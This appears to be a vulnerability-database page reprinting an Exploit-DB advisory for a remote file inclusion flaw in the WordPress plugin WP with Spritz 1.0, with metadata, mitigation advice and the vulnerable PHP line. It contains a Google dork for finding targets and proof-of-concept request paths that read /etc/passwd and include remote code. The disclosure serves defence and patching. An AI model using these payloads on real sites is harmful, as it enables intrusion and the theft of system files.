WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion

vendor:

WP with Spritz

by:

Wadeek

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: WP with Spritz

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: YES

Related CWE: N/A

CPE: a:wordpress:wp_with_spritz

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Apache2 with PHP 7 on Linux

2018

WordPress Plugin WP with Spritz 1.0 – Remote File Inclusion

The WordPress Plugin WP with Spritz version 1.0 is vulnerable to Remote File Inclusion. An attacker can exploit this vulnerability by sending a malicious URL in the 'url' parameter of the 'wp.spritz.content.filter.php' script. This can allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

The user should update the WordPress Plugin WP with Spritz to the latest version. Additionally, the user should ensure that the web application firewall is enabled and properly configured.

Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion
# Date: 2018-04-25
# Exploit Author: Wadeek
# Software Link: https://downloads.wordpress.org/plugin/wp-with-spritz.zip
# Software Version: 1.0
# Google Dork: intitle:("Spritz Login Success") AND inurl:("wp-with-spritz/wp.spritz.login.success.html")
# Tested on: Apache2 with PHP 7 on Linux
# Category: webapps


1. Version Disclosure

/wp-content/plugins/wp-with-spritz/readme.txt

2. Source Code

if(isset($_GET['url'])){
$content=file_get_contents($_GET['url']);

3. Proof of Concept

/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec